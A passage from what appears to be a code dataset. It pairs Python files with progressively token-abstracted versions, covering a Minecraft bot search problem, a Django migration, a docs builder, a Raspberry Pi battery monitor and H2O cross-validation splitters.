state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _ReturnProblem(SearchProblem):\n <docstring token>\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n <function token>\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _ReturnProblem(SearchProblem):\n <docstring token>\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n <function token>\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _ReturnProblem(SearchProblem):\n <docstring token>\n <function token>\n <function token>\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _ReturnProblem(SearchProblem):\n <docstring token>\n <function token>\n <function token>\n <function token>\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _ReturnProblem(SearchProblem):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n" ]
false
3
45969b346d6d5cbdef2f5d2f74270cf12024072d
# Generated by Django 4.1.9 on 2023-06-29 16:11 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("search", "0003_auto_20230209_1441"), ] operations = [ migrations.CreateModel( name="SearchSettings", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ], options={ "permissions": ( ("change_boost", "Edit boost settings for search components"), ("view_explore", "View the global search explore page"), ), "managed": False, "default_permissions": (), }, ), ]
[ "# Generated by Django 4.1.9 on 2023-06-29 16:11\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n (\"search\", \"0003_auto_20230209_1441\"),\n ]\n\n operations = [\n migrations.CreateModel(\n name=\"SearchSettings\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n ],\n options={\n \"permissions\": (\n (\"change_boost\", \"Edit boost settings for search components\"),\n (\"view_explore\", \"View the global search explore page\"),\n ),\n \"managed\": False,\n \"default_permissions\": (),\n },\n ),\n ]\n", "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('search', '0003_auto_20230209_1441')]\n operations = [migrations.CreateModel(name='SearchSettings', fields=[(\n 'id', models.AutoField(auto_created=True, primary_key=True,\n serialize=False, verbose_name='ID'))], options={'permissions': ((\n 'change_boost', 'Edit boost settings for search components'), (\n 'view_explore', 'View the global search explore page')), 'managed':\n False, 'default_permissions': ()})]\n", "<import token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('search', '0003_auto_20230209_1441')]\n operations = [migrations.CreateModel(name='SearchSettings', fields=[(\n 'id', models.AutoField(auto_created=True, primary_key=True,\n serialize=False, verbose_name='ID'))], options={'permissions': ((\n 'change_boost', 'Edit boost settings for search components'), (\n 'view_explore', 'View the global search explore page')), 'managed':\n False, 'default_permissions': ()})]\n", "<import token>\n\n\nclass Migration(migrations.Migration):\n <assignment token>\n <assignment token>\n", "<import token>\n<class token>\n" ]
false
4
3fbf1768a2fe78df591c49490dfce5fb374e7fc2
from functools import wraps import os def restoring_chdir(fn): #XXX:dc: This would be better off in a neutral module @wraps(fn) def decorator(*args, **kw): try: path = os.getcwd() return fn(*args, **kw) finally: os.chdir(path) return decorator class BaseBuilder(object): """ The Base for all Builders. Defines the API for subclasses. All workflow steps need to return true, otherwise it is assumed something went wrong and the Builder will stop """ workflow = ['clean', 'build', 'move'] def __init__(self, version): self.version = version def run(self): for step in self.workflow: fn = getattr(self, step) result = fn() assert result @restoring_chdir def force(self): """ An optional step to force a build even when nothing has changed. """ print "Forcing a build by touching files" os.chdir(self.version.project.conf_dir(self.version.slug)) os.system('touch * && touch */*') def clean(self): """ Clean up the version so it's ready for usage. This is used to add RTD specific stuff to Sphinx, and to implement whitelists on projects as well. It is guaranteed to be called before your project is built. """ raise NotImplementedError def build(self): """ Do the actual building of the documentation. """ raise NotImplementedError def move(self): """ Move the documentation from it's generated place to its final home. This needs to understand both a single server dev environment, as well as a multi-server environment. """ raise NotImplementedError @property def changed(self): """ Says whether the documentation has changed, and requires further action. This is mainly used to short-circuit more expensive builds of other output formats if the project docs didn't change on an update. Subclasses are recommended to override for more efficient builds. Defaults to `True` """ return True
[ "from functools import wraps\nimport os\n\n\ndef restoring_chdir(fn):\n #XXX:dc: This would be better off in a neutral module\n @wraps(fn)\n def decorator(*args, **kw):\n try:\n path = os.getcwd()\n return fn(*args, **kw)\n finally:\n os.chdir(path)\n return decorator\n\n\nclass BaseBuilder(object):\n \"\"\"\n The Base for all Builders. Defines the API for subclasses.\n All workflow steps need to return true, otherwise it is assumed something\n went wrong and the Builder will stop\n \"\"\"\n\n workflow = ['clean', 'build', 'move']\n\n def __init__(self, version):\n self.version = version\n\n def run(self):\n for step in self.workflow:\n fn = getattr(self, step)\n result = fn()\n assert result\n\n @restoring_chdir\n def force(self):\n \"\"\"\n An optional step to force a build even when nothing has changed.\n \"\"\"\n print \"Forcing a build by touching files\"\n os.chdir(self.version.project.conf_dir(self.version.slug))\n os.system('touch * && touch */*')\n\n def clean(self):\n \"\"\"\n Clean up the version so it's ready for usage.\n\n This is used to add RTD specific stuff to Sphinx, and to\n implement whitelists on projects as well.\n\n It is guaranteed to be called before your project is built.\n \"\"\"\n raise NotImplementedError\n\n def build(self):\n \"\"\"\n Do the actual building of the documentation.\n \"\"\"\n raise NotImplementedError\n\n def move(self):\n \"\"\"\n Move the documentation from it's generated place to its final home.\n\n This needs to understand both a single server dev environment,\n as well as a multi-server environment.\n \"\"\"\n raise NotImplementedError\n\n @property\n def changed(self):\n \"\"\"\n Says whether the documentation has changed, and requires further action.\n\n This is mainly used to short-circuit more expensive builds of other\n output formats if the project docs didn't change on an update.\n Subclasses are recommended to override for more efficient builds.\n\n Defaults to `True`\n \"\"\"\n return True\n" ]
true
5
67b967b688aeac1270eee836e0f6e6b3555b933e
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ This program is run at regular intervals to check the battery charge status of the uninterruptible power supply. In our case, it is a LiPo battery with a nominal voltage of 3.7 volts. By setting the voltage for the Raspberry PI shutdown procedure at 3.7 V,we ensure that the processor has enough time to make a clean shutdown. This program must be launched at regular intervals (5 inute in our case) by the Raspberry PI OS cron task scheduler. The crontab -e command in the home directory opens the cron file and the command line would for example be for a trigger every 5 minutes: 5 * * * * sudo /usr/bin/python3 /home/pi/dev_python/amod/pidcmes_bbu.py """ import time import datetime as dt from subprocess import call from pidcmes_lib import Pidcmes # class for 'pidcmes' procedures pidcmes = Pidcmes() # initialize pidcmese class u_bat_min = 3.7 # minumum battery voltage n_moy = 20 # averaging to reduce glitches stop_run = False # to control the execution (run/stop) u_avg = pidcmes.get_tension(n_moy) # read the value in volts if u_avg < u_bat_min:# or i > 10: print("proper shut down of the machine due to low battery") # time.sleep(5) # call("sudo shutdown -h now", shell=True) # shutdown the RASPI else: print("tout va bien dormez braves gens")
[ "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis program is run at regular intervals to check the battery charge status of the uninterruptible power supply.\nIn our case, it is a LiPo battery with a nominal voltage of 3.7 volts. By setting the voltage for the\nRaspberry PI shutdown procedure at 3.7 V,we ensure that the processor has enough time to make a clean shutdown.\n\nThis program must be launched at regular intervals (5 inute in our case) by the Raspberry PI OS cron task scheduler.\nThe crontab -e command in the home directory opens the cron file and the command line would for example be for a trigger every 5 minutes:\n5 * * * * sudo /usr/bin/python3 /home/pi/dev_python/amod/pidcmes_bbu.py\n\"\"\"\n\nimport time\nimport datetime as dt\n\nfrom subprocess import call\nfrom pidcmes_lib import Pidcmes # class for 'pidcmes' procedures\n \npidcmes = Pidcmes() # initialize pidcmese class\n\nu_bat_min = 3.7 # minumum battery voltage \nn_moy = 20 # averaging to reduce glitches\nstop_run = False # to control the execution (run/stop)\n\nu_avg = pidcmes.get_tension(n_moy) # read the value in volts\n\n \nif u_avg < u_bat_min:# or i > 10: \n print(\"proper shut down of the machine due to low battery\")\n# time.sleep(5)\n# call(\"sudo shutdown -h now\", shell=True) # shutdown the RASPI\nelse:\n print(\"tout va bien dormez braves gens\")\n", "<docstring token>\nimport time\nimport datetime as dt\nfrom subprocess import call\nfrom pidcmes_lib import Pidcmes\npidcmes = Pidcmes()\nu_bat_min = 3.7\nn_moy = 20\nstop_run = False\nu_avg = pidcmes.get_tension(n_moy)\nif u_avg < u_bat_min:\n print('proper shut down of the machine due to low battery')\nelse:\n print('tout va bien dormez braves gens')\n", "<docstring token>\n<import token>\npidcmes = Pidcmes()\nu_bat_min = 3.7\nn_moy = 20\nstop_run = False\nu_avg = pidcmes.get_tension(n_moy)\nif u_avg < u_bat_min:\n print('proper shut down of the machine due to low battery')\nelse:\n print('tout va bien dormez braves gens')\n", "<docstring token>\n<import token>\n<assignment token>\nif u_avg < u_bat_min:\n print('proper shut down of the machine due to low battery')\nelse:\n print('tout va bien dormez braves gens')\n", "<docstring token>\n<import token>\n<assignment token>\n<code token>\n" ]
false
6
c59707ba07c1659d94684c54cdd7bb2658cba935
from __future__ import division, print_function, absolute_import import numbers import warnings from abc import ABCMeta, abstractmethod import numpy as np from .base import check_frame from skutil.base import overrides from sklearn.externals import six from sklearn.base import _pprint from sklearn.utils.fixes import signature, bincount from sklearn.utils import check_random_state from math import ceil, floor try: from h2o import H2OEstimator except ImportError: from h2o.estimators.estimator_base import H2OEstimator try: from sklearn.model_selection import KFold SK18 = True except ImportError: from sklearn.cross_validation import KFold SK18 = False __all__ = [ 'check_cv', 'h2o_train_test_split', 'H2OKFold', 'H2OShuffleSplit', 'H2OStratifiedKFold', 'H2OStratifiedShuffleSplit' ] def _build_repr(self): # XXX This is copied from sklearn.BaseEstimator's get_params cls = self.__class__ init = getattr(cls.__init__, 'deprecated_original', cls.__init__) init_signature = signature(init) if init is object.__init__: args = [] else: args = sorted([p.name for p in init_signature.parameters.values() if p.name != 'self' and p.kind != p.VAR_KEYWORD]) class_name = self.__class__.__name__ params = dict() for key in args: warnings.simplefilter("always", DeprecationWarning) try: with warnings.catch_warnings(record=True) as w: value = getattr(self, key, None) if len(w) and w[0].category == DeprecationWarning: continue finally: warnings.filters.pop(0) params[key] = value return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name))) def check_cv(cv=3): """Checks the ``cv`` parameter to determine whether it's a valid int or H2OBaseCrossValidator. Parameters ---------- cv : int or H2OBaseCrossValidator, optional (default=3) The number of folds or the H2OBaseCrossValidator instance. Returns ------- cv : H2OBaseCrossValidator The instance of H2OBaseCrossValidator """ if cv is None: cv = 3 if isinstance(cv, numbers.Integral): return H2OKFold(cv) if not isinstance(cv, H2OBaseCrossValidator): raise ValueError('expected int or instance of ' 'H2OBaseCrossValidator but got %s' % type(cv)) return cv def h2o_train_test_split(frame, test_size=None, train_size=None, random_state=None, stratify=None): """Splits an H2OFrame into random train and test subsets Parameters ---------- frame : H2OFrame The h2o frame to split test_size : float, int, or None (default=None) If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the test split. If int, represents the absolute number of test samples. If None, the value is automatically set to the complement of the train size. If train size is also None, test size is set to 0.25 train_size : float, int, or None (default=None) If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the train split. If int, represents the absolute number of train samples. If None, the value is automatically set to the complement of the test size. random_state : int or RandomState Pseudo-random number generator state used for random sampling. stratify : str or None (default=None) The name of the target on which to stratify the sampling Returns ------- out : tuple, shape=(2,) training_frame : H2OFrame The training fold split testing_frame : H2OFrame The testing fold split """ frame = check_frame(frame, copy=False) if test_size is None and train_size is None: test_size = 0.25 if stratify is not None: CVClass = H2OStratifiedShuffleSplit else: CVClass = H2OShuffleSplit cv = CVClass(n_splits=2, test_size=test_size, train_size=train_size, random_state=random_state) # for the h2o one, we only need iter 0 tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0] # h2o "doesn't reorder rows" so we need to keep these sorted... train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1])) out = ( frame[train, :], frame[test, :] ) return out # Avoid a pb with nosetests... h2o_train_test_split.__test__ = False def _val_y(y): if isinstance(y, six.string_types): return str(y) elif y is None: return y raise TypeError('y must be a string. Got %s' % y) class H2OBaseCrossValidator(six.with_metaclass(ABCMeta)): """Base class for H2O cross validation operations. All implementing subclasses should override ``get_n_splits`` and ``_iter_test_indices``. """ def __init__(self): pass def split(self, frame, y=None): """Generate indices to split data into training and test. Parameters ---------- frame : ``H2OFrame`` The h2o frame to split y : str, optional (default=None) The name of the column to stratify, if applicable. Returns ------- train : ndarray The training set indices for the split test : ndarray The testing set indices for that split """ frame = check_frame(frame, copy=False) indices = np.arange(frame.shape[0]) for test_index in self._iter_test_masks(frame, y): train_index = indices[np.logical_not(test_index)] test_index = indices[test_index] # h2o can't handle anything but lists... yield list(train_index), list(test_index) def _iter_test_masks(self, frame, y=None): """Generates boolean masks corresponding to the tests set. Parameters ---------- frame : H2OFrame The h2o frame to split y : string, optional (default=None) The column to stratify. Returns ------- test_mask : np.ndarray, shape=(n_samples,) The indices for the test split """ for test_index in self._iter_test_indices(frame, y): test_mask = np.zeros(frame.shape[0], dtype=np.bool) test_mask[test_index] = True yield test_mask def _iter_test_indices(self, frame, y=None): raise NotImplementedError('this method must be implemented by a subclass') @abstractmethod def get_n_splits(self): """Get the number of splits or folds for this instance of the cross validator. """ pass def __repr__(self): return _build_repr(self) def _validate_shuffle_split_init(test_size, train_size): """Validation helper to check the test_size and train_size at init""" if test_size is None and train_size is None: raise ValueError('test_size and train_size can not both be None') if test_size is not None: if np.asarray(test_size).dtype.kind == 'f': if test_size >= 1.: raise ValueError( 'test_size=%f should be smaller ' 'than 1.0 or be an integer' % test_size) elif np.asarray(test_size).dtype.kind != 'i': raise ValueError('Invalid value for test_size: %r' % test_size) if train_size is not None: if np.asarray(train_size).dtype.kind == 'f': if train_size >= 1.: raise ValueError( 'train_size=%f should be smaller ' 'than 1.0 or be an integer' % test_size) elif (np.asarray(test_size).dtype.kind == 'f' and (train_size + test_size) > 1.): raise ValueError('The sum of test_size and train_size = %f' 'should be smaller than 1.0. Reduce test_size ' 'and/or train_size.' % (train_size + test_size)) elif np.asarray(train_size).dtype.kind != 'i': raise ValueError('Invalid value for train_size: %r' % train_size) def _validate_shuffle_split(n_samples, test_size, train_size): if test_size is not None and np.asarray(test_size).dtype.kind == 'i' and test_size >= n_samples: raise ValueError('test_size=%d should be smaller ' 'than the number of samples %d' % (test_size, n_samples)) if train_size is not None and np.asarray(train_size).dtype.kind == 'i' and train_size >= n_samples: raise ValueError('train_size=%d should be smaller ' 'than the number of samples %d' % (train_size, n_samples)) if np.asarray(test_size).dtype.kind == 'f': n_test = ceil(test_size * n_samples) elif np.asarray(test_size).dtype.kind == 'i': n_test = float(test_size) if train_size is None: n_train = n_samples - n_test elif np.asarray(train_size).dtype.kind == 'f': n_train = floor(train_size * n_samples) else: n_train = float(train_size) if test_size is None: n_test = n_samples - n_train if n_train + n_test > n_samples: raise ValueError('The sum of train_size and test_size=%d, ' 'should be smaller than the number of ' 'samples %d. Reduce test_size and/or ' 'train_size.' % (n_train + n_test, n_samples)) return int(n_train), int(n_test) class H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)): """Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This is used for ``h2o_train_test_split`` in strategic train/test splits of H2OFrames. Implementing subclasses should override ``_iter_indices``. Parameters ---------- n_splits : int, optional (default=2) The number of folds or splits in the split test_size : float or int, optional (default=0.1) The ratio of observations for the test fold train_size : float or int, optional (default=None) The ratio of observations for the train fold random_state : int or RandomState, optional (default=None) The random state for duplicative purposes. """ def __init__(self, n_splits=2, test_size=0.1, train_size=None, random_state=None): _validate_shuffle_split_init(test_size, train_size) self.n_splits = n_splits self.test_size = test_size self.train_size = train_size self.random_state = random_state def split(self, frame, y=None): """Split the frame. Parameters ---------- frame : H2OFrame The frame to split y : string, optional (default=None) The column to stratify. """ for train, test in self._iter_indices(frame, y): yield train, test @abstractmethod def _iter_indices(self, frame, y): """Abstract method for iterating the indices. Parameters ---------- frame : H2OFrame The frame to split y : string, optional (default=None) The column to stratify. """ pass def get_n_splits(self): """Get the number of splits or folds for this instance of the shuffle split. """ return self.n_splits def __repr__(self): return _build_repr(self) class H2OShuffleSplit(H2OBaseShuffleSplit): """Default shuffle splitter used for ``h2o_train_test_split``. This shuffle split class will not perform any stratification, and will simply shuffle indices and split into the number of specified sub-frames. """ def _iter_indices(self, frame, y=None): """Iterate the indices. Parameters ---------- frame : H2OFrame The frame to split y : string, optional (default=None) The column to stratify. Since this class does not perform stratification, ``y`` is unused. Returns ------- ind_train : np.ndarray, shape=(n_samples,) The train indices ind_test : np.ndarray, shape=(n_samples,) The test indices """ n_samples = frame.shape[0] n_train, n_test = _validate_shuffle_split(n_samples, self.test_size, self.train_size) rng = check_random_state(self.random_state) for i in range(self.n_splits): permutation = rng.permutation(n_samples) ind_test = permutation[:n_test] ind_train = permutation[n_test:(n_test + n_train)] yield ind_train, ind_test class H2OStratifiedShuffleSplit(H2OBaseShuffleSplit): """Shuffle splitter used for ``h2o_train_test_split`` when stratified option is specified. This shuffle split class will perform stratification. """ def _iter_indices(self, frame, y): """Iterate the indices with stratification. Parameters ---------- frame : H2OFrame The frame to split y : string The column to stratify. Returns ------- train : np.ndarray, shape=(n_samples,) The train indices test : np.ndarray, shape=(n_samples,) The test indices """ n_samples = frame.shape[0] n_train, n_test = _validate_shuffle_split(n_samples, self.test_size, self.train_size) # need to validate y... y = _val_y(y) target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()) classes, y_indices = np.unique(target, return_inverse=True) n_classes = classes.shape[0] class_counts = bincount(y_indices) if np.min(class_counts) < 2: raise ValueError('The least populated class in y has only 1 ' 'member, which is too few. The minimum number of labels ' 'for any class cannot be less than 2.') if n_train < n_classes: raise ValueError('The train_size=%d should be greater than or ' 'equal to the number of classes=%d' % (n_train, n_classes)) if n_test < n_classes: raise ValueError('The test_size=%d should be greater than or ' 'equal to the number of classes=%d' % (n_test, n_classes)) rng = check_random_state(self.random_state) p_i = class_counts / float(n_samples) n_i = np.round(n_train * p_i).astype(int) t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)) for _ in range(self.n_splits): train = [] test = [] for i, class_i in enumerate(classes): permutation = rng.permutation(class_counts[i]) perm_indices_class_i = np.where((target == class_i))[0][permutation] train.extend(perm_indices_class_i[:n_i[i]]) test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]]) # Might end up here with less samples in train and test than we asked # for, due to rounding errors. if len(train) + len(test) < n_train + n_test: missing_indices = np.where(bincount(train + test, minlength=len(target)) == 0)[0] missing_indices = rng.permutation(missing_indices) n_missing_train = n_train - len(train) n_missing_test = n_test - len(test) if n_missing_train > 0: train.extend(missing_indices[:n_missing_train]) if n_missing_test > 0: test.extend(missing_indices[-n_missing_test:]) train = rng.permutation(train) test = rng.permutation(test) yield train, test def split(self, frame, y): """Split the frame with stratification. Parameters ---------- frame : H2OFrame The frame to split y : string The column to stratify. """ return super(H2OStratifiedShuffleSplit, self).split(frame, y) class _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)): """Base class for KFold and Stratified KFold. Parameters ---------- n_folds : int The number of splits shuffle : bool Whether to shuffle indices random_state : int or RandomState The random state for the split """ @abstractmethod def __init__(self, n_folds, shuffle, random_state): if not isinstance(n_folds, numbers.Integral): raise ValueError('n_folds must be of Integral type. ' '%s of type %s was passed' % (n_folds, type(n_folds))) n_folds = int(n_folds) if n_folds <= 1: raise ValueError('k-fold cross-validation requires at least one ' 'train/test split by setting n_folds=2 or more') if shuffle not in [True, False]: raise TypeError('shuffle must be True or False. Got %s (type=%s)' % (str(shuffle), type(shuffle))) self.n_folds = n_folds self.shuffle = shuffle self.random_state = random_state @overrides(H2OBaseCrossValidator) def split(self, frame, y=None): """Split the frame. Parameters ---------- frame : H2OFrame The frame to split y : string, optional (default=None) The column to stratify. """ frame = check_frame(frame, copy=False) n_obs = frame.shape[0] if self.n_folds > n_obs: raise ValueError('Cannot have n_folds greater than n_obs') for train, test in super(_H2OBaseKFold, self).split(frame, y): yield train, test @overrides(H2OBaseCrossValidator) def get_n_splits(self): """Get the number of splits or folds. Returns ------- n_folds : int The number of folds """ return self.n_folds class H2OKFold(_H2OBaseKFold): """K-folds cross-validator for an H2OFrame. Parameters ---------- n_folds : int, optional (default=3) The number of splits shuffle : bool, optional (default=False) Whether to shuffle indices random_state : int or RandomState, optional (default=None) The random state for the split """ def __init__(self, n_folds=3, shuffle=False, random_state=None): super(H2OKFold, self).__init__(n_folds, shuffle, random_state) @overrides(_H2OBaseKFold) def _iter_test_indices(self, frame, y=None): n_obs = frame.shape[0] indices = np.arange(n_obs) if self.shuffle: check_random_state(self.random_state).shuffle(indices) n_folds = self.n_folds fold_sizes = (n_obs // n_folds) * np.ones(n_folds, dtype=np.int) fold_sizes[:n_obs % n_folds] += 1 current = 0 for fold_size in fold_sizes: start, stop = current, current + fold_size yield indices[start:stop] current = stop class H2OStratifiedKFold(_H2OBaseKFold): """K-folds cross-validator for an H2OFrame with stratified splits. Parameters ---------- n_folds : int, optional (default=3) The number of splits shuffle : bool, optional (default=False) Whether to shuffle indices random_state : int or RandomState, optional (default=None) The random state for the split """ def __init__(self, n_folds=3, shuffle=False, random_state=None): super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state) def split(self, frame, y): """Split the frame with stratification. Parameters ---------- frame : H2OFrame The frame to split y : string The column to stratify. """ return super(H2OStratifiedKFold, self).split(frame, y) def _iter_test_masks(self, frame, y): test_folds = self._make_test_folds(frame, y) for i in range(self.n_folds): yield test_folds == i def _make_test_folds(self, frame, y): if self.shuffle: rng = check_random_state(self.random_state) else: rng = self.random_state # validate that it's a string y = _val_y(y) # gets a string back or None if y is None: raise ValueError('H2OStratifiedKFold requires a target name (got None)') target = frame[y].as_data_frame(use_pandas=True)[y].values n_samples = target.shape[0] unique_y, y_inversed = np.unique(target, return_inverse=True) y_counts = bincount(y_inversed) min_labels = np.min(y_counts) if np.all(self.n_folds > y_counts): raise ValueError(('All the n_labels for individual classes' ' are less than %d folds.' % self.n_folds), Warning) if self.n_folds > min_labels: warnings.warn(('The least populated class in y has only %d' ' members, which is too few. The minimum' ' number of labels for any class cannot' ' be less than n_folds=%d.' % (min_labels, self.n_folds)), Warning) # NOTE FROM SKLEARN: # pre-assign each sample to a test fold index using individual KFold # splitting strategies for each class so as to respect the balance of # classes # NOTE: Passing the data corresponding to ith class say X[y==class_i] # will break when the data is not 100% stratifiable for all classes. # So we pass np.zeroes(max(c, n_folds)) as data to the KFold. # Remember, however that we might be using the old-fold KFold which doesn't # have a split method... if SK18: per_cls_cvs = [ KFold(self.n_folds, # using sklearn's KFold here shuffle=self.shuffle, random_state=rng).split(np.zeros(max(count, self.n_folds))) for count in y_counts ] else: per_cls_cvs = [ KFold(max(count, self.n_folds), # using sklearn's KFold here self.n_folds, shuffle=self.shuffle, random_state=rng) for count in y_counts ] test_folds = np.zeros(n_samples, dtype=np.int) for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)): for cls, (_, test_split) in zip(unique_y, per_cls_splits): cls_test_folds = test_folds[target == cls] # the test split can be too big because we used # KFold(...).split(X[:max(c, n_folds)]) when data is not 100% # stratifiable for all the classes # (we use a warning instead of raising an exception) # If this is the case, let's trim it: test_split = test_split[test_split < len(cls_test_folds)] cls_test_folds[test_split] = test_fold_indices test_folds[target == cls] = cls_test_folds return test_folds
[ "from __future__ import division, print_function, absolute_import\nimport numbers\nimport warnings\nfrom abc import ABCMeta, abstractmethod\nimport numpy as np\nfrom .base import check_frame\nfrom skutil.base import overrides\nfrom sklearn.externals import six\nfrom sklearn.base import _pprint\nfrom sklearn.utils.fixes import signature, bincount\nfrom sklearn.utils import check_random_state\nfrom math import ceil, floor\n\ntry:\n from h2o import H2OEstimator\nexcept ImportError:\n from h2o.estimators.estimator_base import H2OEstimator\n\ntry:\n from sklearn.model_selection import KFold\n SK18 = True\nexcept ImportError:\n from sklearn.cross_validation import KFold\n SK18 = False\n\n__all__ = [\n 'check_cv',\n 'h2o_train_test_split',\n 'H2OKFold',\n 'H2OShuffleSplit',\n 'H2OStratifiedKFold',\n 'H2OStratifiedShuffleSplit'\n]\n\n\ndef _build_repr(self):\n # XXX This is copied from sklearn.BaseEstimator's get_params\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n\n init_signature = signature(init)\n\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values()\n if p.name != 'self' and p.kind != p.VAR_KEYWORD])\n\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter(\"always\", DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\ndef check_cv(cv=3):\n \"\"\"Checks the ``cv`` parameter to determine\n whether it's a valid int or H2OBaseCrossValidator.\n\n Parameters\n ----------\n\n cv : int or H2OBaseCrossValidator, optional (default=3)\n The number of folds or the H2OBaseCrossValidator\n instance.\n\n Returns\n -------\n\n cv : H2OBaseCrossValidator\n The instance of H2OBaseCrossValidator\n \"\"\"\n if cv is None:\n cv = 3\n\n if isinstance(cv, numbers.Integral):\n return H2OKFold(cv)\n\n if not isinstance(cv, H2OBaseCrossValidator):\n raise ValueError('expected int or instance of '\n 'H2OBaseCrossValidator but got %s'\n % type(cv))\n\n return cv\n\n\ndef h2o_train_test_split(frame, test_size=None, train_size=None, random_state=None, stratify=None):\n \"\"\"Splits an H2OFrame into random train and test 